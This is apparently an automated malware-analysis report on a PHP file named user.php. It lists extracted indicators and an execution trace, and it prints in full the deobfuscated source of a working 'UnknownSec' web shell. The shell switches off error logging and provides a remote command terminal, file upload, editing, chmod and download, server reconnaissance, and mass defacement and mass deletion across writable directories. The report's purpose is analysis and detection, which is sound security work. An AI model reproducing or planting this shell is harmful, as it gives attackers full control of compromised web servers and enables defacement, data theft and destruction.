PHP Malware Analysis
user.php
md5: fd3db2f81919540056026d4a5b17dbfb
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- unknownsec1337@gmail.com (Deobfuscated, Original)
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Original, Traces)
- php_uname (Deobfuscated, Original)
- set_time_limit (Deobfuscated, Original, Traces)
Execution
- exec (Deobfuscated, Original)
- passthru (Deobfuscated, Original)
- shell_exec (Deobfuscated, Original)
- system (Deobfuscated, Original)
Files
- copy (Deobfuscated, Original)
- file_get_contents (Deobfuscated, Original)
- file_put_contents (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- " . $_SERVER['HTTP_HOST'] . " - {$▛} 403 (Deobfuscated)
- ".$_SERVER['HTTP_HOST']." - $▛ 403 (Original)
- localhost - UnknownSec 403 (HTML)
Deobfuscated PHP code
<?php
/* ~ Gw doain kalo lu recode tytyd lu jadi kecil
~ v.02
~ Special thanks to Michy Amrane
~ Untuk beberapa tools gw ambil dari indoxploit, karena tidak semuanya gw otakin sendiri.
*/
set_time_limit(0);
error_reporting(0);
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$▛ = 'UnknownSec';
$▘ = "<style>table{display:none;}</style>";
if (isset($_GET['option']) && $_POST['opt'] == 'download') {
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="' . $_POST['name'] . '"');
echo file_get_contents($_POST['path']);
exit;
}
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
function ▟($dir, $p)
{
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>" . $p . "</font>";
} else {
return "<font color='red'>" . $p . "</font>";
}
}
function dc($dir, $p)
{
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>" . $p . "</font>";
} else {
return "<font color='red'>" . $p . "</font>";
}
}
function ip()
{
$ipas = '';
if (getenv('HTTP_CLIENT_IP')) {
$ipas = getenv('HTTP_CLIENT_IP');
} else {
if (getenv('HTTP_X_FORWARDED_FOR')) {
$ipas = getenv('HTTP_X_FORWARDED_FOR');
} else {
if (getenv('HTTP_X_FORWARDED')) {
$ipas = getenv('HTTP_X_FORWARDED');
} else {
if (getenv('HTTP_FORWARDED_FOR')) {
$ipas = getenv('HTTP_FORWARDED_FOR');
} else {
if (getenv('HTTP_FORWARDED')) {
$ipas = getenv('HTTP_FORWARDED');
} else {
if (getenv('REMOTE_ADDR')) {
$ipas = getenv('REMOTE_ADDR');
} else {
$ipas = 'IP tidak dikenali';
}
}
}
}
}
}
return $ipas;
}
function x($cmd)
{
$▙ = '';
if (function_exists('exec')) {
@exec($cmd, $▙);
$▙ = @join("\n", $▙);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($cmd);
$▙ = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($cmd);
$▙ = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$▙ = shell_exec($cmd);
} else {
return "\xe2\x86\xb3 Unable to execute command\n";
}
return $▙ == '' ? "\xe2\x86\xb3 Query did not return anything\n" : $▙;
}
function p($file)
{
$p = fileperms($file);
if (($p & 0xc000) == 0xc000) {
$i = 's';
} elseif (($p & 0xa000) == 0xa000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= $p & 0x100 ? 'r' : '-';
$i .= $p & 0x80 ? 'w' : '-';
$i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-');
$i .= $p & 0x20 ? 'r' : '-';
$i .= $p & 0x10 ? 'w' : '-';
$i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-');
$i .= $p & 0x4 ? 'r' : '-';
$i .= $p & 0x2 ? 'w' : '-';
$i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-');
return $i;
}
echo "\r\n<!DOCTYPE HTML>\r\n<html>\r\n\t<head>\r\n\t\t<meta name='author' content='{$▛}'>\r\n\t\t<meta name='robots' content='NOINDEX, NOFOLLOW'>\r\n\t\t<title>" . $_SERVER['HTTP_HOST'] . " - {$▛} 403</title>\r\n\t\t<meta name='viewport' content='width=device-width, initial-scale=0.60, user-scalable=no'>\r\n\t\t<link rel='stylesheet' href='//unknownsec1337.github.io/main/style_2.css'>\r\n\t</head>\r\n<body>\r\n<script src='//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>\r\n<script src='//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js'></script>\r\n\t<div class='card text-dark'>\r\n\t\t<div class='card-header'>\r\n\t\t\t<a href='" . $_SERVER['PHP_SELF'] . "'><h4>{$▛} Bypass <i class='fas fa-biohazard'></i> <img alt='Bypass 403' src='//icons.getbootstrap.com/assets/icons/activity.svg' width='25px'> 403</h4></a>";
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<i class=\"bi bi-hdd-rack\"></i> : <a href=\"?path=/\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a href=\"?path=";
for ($i = 0; $i <= $id; $i++) {
echo "{$paths[$i]}";
if ($i != $id) {
echo "/";
}
}
echo '">' . $pat . '</a>/';
}
echo " [ " . ▟($path, p($path)) . " ]";
echo "\r\n\t\t<div class='dropdown'>\r\n\t\t\t\t<button class='btn btn-dark dropdown-toggle' type='button' id='dropdownMenuButton' data-toggle='dropdown' aria-haspopup='true' aria-expanded='false'><i class='bi bi-menu-down'></i> Menu</button>\r\n\t\t\t<div class='dropdown-menu'>\r\n\t\t\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=upload'><i class='bi bi-upload'></i> Upload</a>\r\n\t\t\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=depes'><i class='bi bi-exclamation-diamond'></i> Mass depes</a>\r\n\t\t\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=delete'><i class='bi bi-trash'></i> Mass delete</a>\r\n\t\t\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=cmd'><i class='bi bi-terminal'></i> Terminal</a>\r\n\t\t\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=info'><i class='bi bi-info-circle'></i> Info server</a>\r\n\t\t\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=about'><i class='bi bi-info'></i> About</a></h5>\r\n\t\t\t</div>\r\n\t\t</div>\r\n\t</div>\r\n</div>";
// tools nya
if (isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\", "/", $dir);
$scdir = explode("/", $dir);
for ($i = 0; $i <= $c_dir; $i++) {
$scdir[$i];
if ($i != $c_dir) {
} elseif ($_GET['id'] == 'depes') {
function mass_kabeh($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<font color=green>success</font>] {$▚}<br>";
file_put_contents($▚, $isi_script);
$▟ = mass_kabeh($dirc, $namafile, $isi_script);
}
}
}
}
}
}
function mass_biasa($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<font color=green>success</font>] {$dirb}/{$namafile}<br>";
file_put_contents($▚, $isi_script);
}
}
}
}
}
}
if ($_POST['start']) {
if ($_POST['tipe'] == 'massal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif ($_POST['tipe'] == 'biasa') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
}
} else {
echo "<br />{$▘}\r\n<form method='post'>\r\n\t<b>Tipe:</b><br>\r\n<div class='custom-control custom-switch'>\r\n\t<input type='checkbox' id='customSwitch' class='custom-control-input' name='tipe' value='biasa'>\r\n\t<label class='custom-control-label' for='customSwitch'>Biasa</label>\r\n</div>\r\n<div class='custom-control custom-switch'>\r\n\t<input type='checkbox' id='customSwitch1' class='custom-control-input' name='tipe' value='massal'>\r\n\t<label class='custom-control-label' for='customSwitch1'>Massal</label>\r\n</div>\r\n\t<b><i class='bi bi-folder'></i> Lokasi:</b>\r\n\t<input class='form-control' type='text' name='d_dir' value='{$dir}' height='10'>\r\n\t<b><i class='bi bi-file-earmark'></i> File name:</b>\r\n\t<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'>\r\n\t<b><i class='bi bi-file-earmark'></i> Your script:</b>\r\n\t<textarea class='form-control' rows='7' name='script' placeholder='your secript here'></textarea><br />\r\n\t<input type='submit' name='start' value='Go' class='btn btn-primary btn-block'>\r\n</form>";
}
} elseif ($_GET['id'] == 'info') {
$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
$disfc = "<font color=green>NONE</font>";
} else {
$disfc = "<font color=red>{$disfunc}</font>";
}
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$sm = @ini_get(strtolower("safe_mode")) == 'on' ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";
echo '<br />' . $▘ . '
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<b>Uname: </b><font color=green>" . php_uname() . "</font><br />";
echo "<b>Software: </b><font color=green>" . $_SERVER['SERVER_SOFTWARE'] . "</font><br />";
echo "<b>PHP version: </b><font color=green>PHP_VERSION</font> <b>PHP os:</b> <font color=green>PHP_OS</font><br />";
echo "<b>Server Ip: </b><font color=green>" . gethostbyname($_SERVER['HTTP_HOST']) . "</font><br />";
echo "<b>Your Ip: </b><font color=green>" . ip() . "</font><br />";
echo "<b>User: </b><font color=green>{$user}</font> ({$uid}) | <b>Group:</b> <font color=green>{$group}</font> ({$gid})<br />";
echo "<b>Safe Mode: </b>{$sm}<br />";
echo "<kbd>Disable Function:</kbd><pre>{$disfc}</pre>";
echo "</div>\r\n\t</div>\r\n</div>";
} elseif ($_GET['id'] == 'about') {
echo '<br />' . $▘ . '
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<img alt='AnonSec Team' class='img-thumbnail rounded mx-auto d-block' src='//unknownsec1337.github.io/AnonSec.jpg' width='150px'>";
echo "<b>- About Me -</b><br />";
echo "Thanks bre dah pake shell nya, jika ada yang error silahkan hubungi email di bawah.<br />Greetz : <a href=''>{ AnonSec Team } - And You</a><br />My email: <a href='mailto:unknownsec1337@gmail.com'>unknownsec1337@gmail.com</a>";
echo "</div>\r\n\t</div>\r\n</div>";
} elseif ($_GET['id'] == 'cmd') {
echo "<br />{$▘}\r\n<form method='post'>\r\n\t<div class='input-group mb-3'>\r\n\t\t<input type='text' class='form-control' name='cmd' placeholder='ls -la | id | uname -a'>\r\n\t<div class='input-group-append'>\r\n\t\t<input class='btn btn-primary' type='submit' name='id_cmd' value='Go'>\r\n\t</form>\r\n\t</div>\r\n</div>";
if ($_POST['id_cmd']) {
$cmd = $_POST['cmd'];
echo "\r\n<div class='container'>\r\n\t<div class='card text-dark'>\r\n\t\t<div class='card-header'>\r\n\t\t\t<kbd><b>~\$</b> {$cmd}</kbd><pre>" . x($_POST['cmd']) . "</pre>\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n";
}
} elseif ($_GET['id'] == 'upload') {
echo '<br />' . $▘ . '
<form method="post" enctype="multipart/form-data">
<div class="input-group mb-3">
<div class="custom-file">
<label class="custom-file-label" for="inputGroupFile04">
<input class="custom-file-input" id="inputGroupFile04" type="file" name="file" onchange="this.form.submit()" multiple>
</label>
</div>
</div>
</form>';
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success upload",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed upload",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
} elseif ($_GET['id'] == 'delete') {
function hapus_massal($dir, $namafile)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
if (file_exists("{$dir}/{$namafile}")) {
unlink("{$dir}/{$namafile}");
}
} elseif ($dirb === '..') {
if (file_exists("" . dirname($dir) . "/{$namafile}")) {
unlink("" . dirname($dir) . "/{$namafile}");
}
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
if (file_exists($▚)) {
echo "[<font color=green>deleted</font>] {$▚}<br>";
unlink($▚);
$▟ = hapus_massal($dirc, $namafile);
}
}
}
}
}
}
}
if ($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "<br />{$▘}\r\n<form method='post'>\r\n\t<b><i class='bi bi-folder'></i> Lokasi:</b>\r\n\t<input class='form-control' type='text' name='d_dir' value='{$dir}' height='10'>\r\n\t<b><i class='bi bi-file-earmark'></i> File name:</b>\r\n\t<div class='input-group mb-3'>\r\n\t<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'><br>\r\n\t<div class='input-group-append'>\r\n\t<input class='btn btn-primary btn-block' type='submit' name='start' value='Go'>\r\n</form>\r\n\t</div>\r\n\t</div>";
}
}
}
// akhir tools
if (isset($_GET['filesrc'])) {
echo "<br><b>name : </b>" . basename($_GET['filesrc']);
"</br>";
echo '<textarea class="form-control" rows="7" readonly> ' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</textarea><br />';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '<br><b>name : </b>' . basename($_POST['path']);
'</br>';
//Chmod
if ($_POST['opt'] == 'chmod') {
if (isset($_POST['perm'])) {
if (chmod($_POST['path'], $_POST['perm'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success Change Permission",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change permission",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="perm" type="text" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '"/>
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="chmod">
<div class="input-group-append">
<input class="btn btn-primary btn-block" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_GET['opt'] == 'btw') {
$cwd = getcwd();
echo '<form action="?option&path=' . $cwd . '&opt=delete&type=buat" method="POST">
<div class="input-group mb-3">
<input class="form-control" name="name" type="text" value="Folder"/>
<input class="form-control" type="hidden" name="path" value="' . $cwd . '">
<input class="form-control" type="hidden" name="opt" value="delete">
<div class="input-group-append">
<input class="btn btn-primary btn-block" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success change name",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change name",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="newname" type="text" value="' . $_POST['name'] . '" />
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="rename">
<div class="input-group-append">
<input class="btn btn-primary btn-block" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Edit file Success",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed edit file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
fclose($fp);
}
echo '<form method="POST">
<textarea class="form-control" rows="7" name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="edit">
<input class="btn btn-primary btn-block" type="submit" value="Go"/>
</form><br />';
}
echo "</center>";
} else {
echo "</table><br /><center>";
//delete dir
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete dir",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete dir",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete file",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
}
echo "</center>";
$scandir = scandir($path);
$pa = getcwd();
echo "<div class=\"container-fluid\"><table class=\"table table-striped table-bordered table-hover bg-white\" cellspacing=\"0\" cellpadding=\"7\" width=\"100%\">\r\n<tr>\r\n\t<th class=\"text-center bg-dark text-white\">Name</th>\r\n\t\t<th class=\"text-center bg-dark text-white\">Last edit</th>\r\n\t\t<th class=\"text-center bg-dark text-white\">Size</th>\r\n\t\t<th class=\"text-center bg-dark text-white\">Permission</th>\r\n\t<th class=\"text-center bg-dark text-white\">Options</th>\r\n</tr>\r\n</tr>\r\n<tr>";
foreach ($scandir as $dir) {
$dt = date("Y-m-d g:i:s", filemtime("{$path}/{$dir}"));
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "\r\n\t<tr>\r\n\t<td><img alt='folder' class='ico' src='//unknownsec1337.github.io/icon/folder.png'><a href=\"?path={$path}/{$dir}\">{$dir}</a></td>\r\n\t<td><center>{$dt}</center></td>\r\n\t<td><center>DIR</center></td>\r\n\t<td><center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo p("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center></td>\r\n<td>\r\n<form method=\"POST\" action=\"?option&path={$path}\">\r\n<div class='input-group mb-3 text-center'>\r\n\t<select class=\"form-control\" style=\"width: 40%;\" name=\"opt\">\r\n\t\t<option selected disabled>Select</option>\r\n\t\t<option value=\"delete\">Delete</option>\r\n\t\t<option value=\"chmod\">Chmod</option>\r\n\t\t<option value=\"rename\">Rename</option>\r\n\t</select>\r\n<input type=\"hidden\" name=\"type\" value=\"dir\">\r\n\t<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\r\n\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\r\n\t\t\t<div class='input-group-append'>\r\n\t\t\t<input class=\"btn btn-primary btn-block\" type=\"submit\" value=\"Go\"/>\r\n\t\t</form>\r\n\t</div>\r\n</div>\r\n</td>\r\n</tr>";
}
foreach ($scandir as $file) {
$ft = date("Y-m-d g:i:s", filemtime("{$path}/{$file}"));
if (!is_file($path . '/' . $file)) {
continue;
}
$s = filesize($path . '/' . $file) / 1024;
$s = round($s, 3);
if ($s >= 1024) {
$s = round($s / 1024, 2) . ' MB';
} else {
$s .= ' KB';
}
echo "\r\n<tr>\r\n\t<td><img alt=\"file\" src=\"";
$▖ = strtolower(pathinfo($file, PATHINFO_EXTENSION));
if ($▖ == "htaccess") {
echo "//unknownsec1337.github.io/icon/htaccess.png";
} elseif ($▖ == "png" || $▖ == "jpg" || $▖ == "jpeg" || $▖ == "gif" || $▖ == "ico") {
echo "//unknownsec1337.github.io/icon/images.png";
} elseif ($▖ == "php") {
echo "//unknownsec1337.github.io/icon/php.png";
} elseif ($▖ == "ini") {
echo "//unknownsec1337.github.io/icon/ini.png";
} elseif ($▖ == "html") {
echo "//unknownsec1337.github.io/icon/html.png";
} elseif ($▖ == "js") {
echo "//unknownsec1337.github.io/icon/js.png";
} elseif ($▖ == "css") {
echo "//unknownsec1337.github.io/icon/css.png";
} elseif ($▖ == "json") {
echo "//unknownsec1337.github.io/icon/json.png";
} elseif ($▖ == "txt") {
echo "//unknownsec1337.github.io/icon/txt.png";
} elseif ($▖ == "sql") {
echo "//unknownsec1337.github.io/icon/sql.png";
} elseif ($▖ == "py") {
echo "//unknownsec1337.github.io/icon/py.png";
} elseif ($▖ == "pl") {
echo "//unknownsec1337.github.io/icon/pl.png";
} elseif ($▖ == "dat") {
echo "//unknownsec1337.github.io/icon/dat.png";
} elseif ($▖ == "md") {
echo "//unknownsec1337.github.io/icon/md.png";
} elseif ($▖ == "sh") {
echo "//unknownsec1337.github.io/icon/sh.png";
} elseif ($▖ == "zip") {
echo "//unknownsec1337.github.io/icon/zip.png";
} elseif ($▖ == "rar") {
echo "//unknownsec1337.github.io/icon/rar.png";
} elseif ($▖ == "xls") {
echo "//unknownsec1337.github.io/icon/xls.png";
} elseif ($▖ == "excel") {
echo "//unknownsec1337.github.io/icon/excel.png";
} elseif ($▖ == "word") {
echo "//unknownsec1337.github.io/icon/word.png";
} elseif ($▖ == "doc") {
echo "//unknownsec1337.github.io/icon/doc.png";
} elseif ($▖ == "mp4") {
echo "//unknownsec1337.github.io/icon/mp4.png";
} elseif ($▖ == "mp3") {
echo "//unknownsec1337.github.io/icon/mp3.png";
} elseif ($▖ == "pdf") {
echo "//unknownsec1337.github.io/icon/pdf.png";
} elseif ($▖ == "csv") {
echo "//unknownsec1337.github.io/icon/csv.png";
} else {
echo "//unknownsec1337.github.io/icon/dflt.png";
}
echo "\" class=\"ico\">";
echo "<a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\r\n\t<td><center>{$ft}</center></td>\r\n\t<td><center>{$s}</center></td>\r\n\t<td><center>";
if (is_writable("{$path}/{$file}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<font color=\"red\">";
}
echo p("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "</center></td>\r\n\t<td>\r\n<form method=\"POST\" action=\"?option&path={$path}\">\r\n<div class='input-group mb-3 text-center'>\r\n<select class=\"form-control\" style=\"width: 40%;\" name=\"opt\">\r\n\t<option selected disabled>Select</option>\r\n\t\t<option value=\"delete\">Delete</option>\r\n\t\t<option value=\"edit\">Edit</option>\r\n\t\t<option value=\"rename\">Rename</option>\r\n\t\t<option value=\"chmod\">Chmod</option>\r\n\t<option value=\"download\">Download</option>\r\n</select>\r\n\t<input type=\"hidden\" name=\"type\" value=\"file\">\r\n\t\t<input type=\"hidden\" name=\"name\" value=\"{$file}\">\r\n\t\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\r\n\t\t<div class='input-group-append'>\r\n\t\t\t<input class=\"btn btn-primary btn-block\" type=\"submit\" value=\"Go\"/>\r\n\t\t</form>\r\n\t</div>\r\n</div>\r\n</td>\r\n</tr>";
}
}
echo "\r\n</table>\r\n<div class='card text-dark'>\r\n\t<div class='card-header text-center'>\r\n\t\t<kbd>Copyright © " . date("Y") . " - <a href=''>{$▛}</a></kbd>\r\n\t</div>\r\n</div>\r\n<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>\r\n<script src='//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js'></script>\r\n<script src='//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>\r\n</body>\r\n</html>";Execution traces
data/traces/fd3db2f81919540056026d4a5b17dbfb_trace-1676244754.2405.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:33:00.138330]
1 0 1 0.000216 393512
1 3 0 0.001255 532184 {main} 1 /var/www/html/uploads/user.php 0 0
2 4 0 0.001283 532184 set_time_limit 0 /var/www/html/uploads/user.php 7 1 0
2 4 1 0.001308 532248
2 4 R FALSE
2 5 0 0.001331 532216 error_reporting 0 /var/www/html/uploads/user.php 8 1 0
2 5 1 0.001351 532256
2 5 R 22527
2 6 0 0.001371 532216 ini_set 0 /var/www/html/uploads/user.php 9 2 'error_log' NULL
2 6 1 0.001395 532288
2 6 R ''
2 7 0 0.001415 532216 ini_set 0 /var/www/html/uploads/user.php 10 2 'log_errors' 0
2 7 1 0.001437 532288
2 7 R '1'
2 8 0 0.001457 532216 ini_set 0 /var/www/html/uploads/user.php 11 2 'max_execution_time' 0
2 8 1 0.001478 532256
2 8 R '0'
2 9 0 0.001498 532184 ini_set 0 /var/www/html/uploads/user.php 12 2 'output_buffering' 0
2 9 1 0.001518 532256
2 9 R FALSE
2 10 0 0.001539 532184 ini_set 0 /var/www/html/uploads/user.php 13 2 'display_errors' 0
2 10 1 0.001561 532256
2 10 R ''
1 A /var/www/html/uploads/user.php 14 $▛ = 'UnknownSec'
1 A /var/www/html/uploads/user.php 15 $▘ = '<style>table{display:none;}</style>'
2 11 0 0.001726 532184 get_magic_quotes_gpc 0 /var/www/html/uploads/user.php 22 0
2 11 1 0.001748 532184
2 11 R FALSE
2 12 0 0.001774 532184 getcwd 0 /var/www/html/uploads/user.php 143 0
2 12 1 0.001795 532232
2 12 R '/var/www/html/uploads'
1 A /var/www/html/uploads/user.php 143 $path = '/var/www/html/uploads'
2 13 0 0.001837 532232 str_replace 0 /var/www/html/uploads/user.php 145 3 '\\' '/' '/var/www/html/uploads'
2 13 1 0.001861 532328
2 13 R '/var/www/html/uploads'
1 A /var/www/html/uploads/user.php 145 $path = '/var/www/html/uploads'
2 14 0 0.001900 532232 explode 0 /var/www/html/uploads/user.php 146 2 '/' '/var/www/html/uploads'
2 14 1 0.001922 532808
2 14 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/user.php 146 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/user.php 147 $id = 0
1 A /var/www/html/uploads/user.php 149 $a = TRUE
1 A /var/www/html/uploads/user.php 147 $id = 1
1 A /var/www/html/uploads/user.php 155 $i = 0
1 A /var/www/html/uploads/user.php 155 $i++
1 A /var/www/html/uploads/user.php 155 $i++
1 A /var/www/html/uploads/user.php 147 $id = 2
1 A /var/www/html/uploads/user.php 155 $i = 0
1 A /var/www/html/uploads/user.php 155 $i++
1 A /var/www/html/uploads/user.php 155 $i++
1 A /var/www/html/uploads/user.php 155 $i++
1 A /var/www/html/uploads/user.php 147 $id = 3
1 A /var/www/html/uploads/user.php 155 $i = 0
1 A /var/www/html/uploads/user.php 155 $i++
1 A /var/www/html/uploads/user.php 155 $i++
1 A /var/www/html/uploads/user.php 155 $i++
1 A /var/www/html/uploads/user.php 155 $i++
1 A /var/www/html/uploads/user.php 147 $id = 4
1 A /var/www/html/uploads/user.php 155 $i = 0
1 A /var/www/html/uploads/user.php 155 $i++
1 A /var/www/html/uploads/user.php 155 $i++
1 A /var/www/html/uploads/user.php 155 $i++
1 A /var/www/html/uploads/user.php 155 $i++
1 A /var/www/html/uploads/user.php 155 $i++
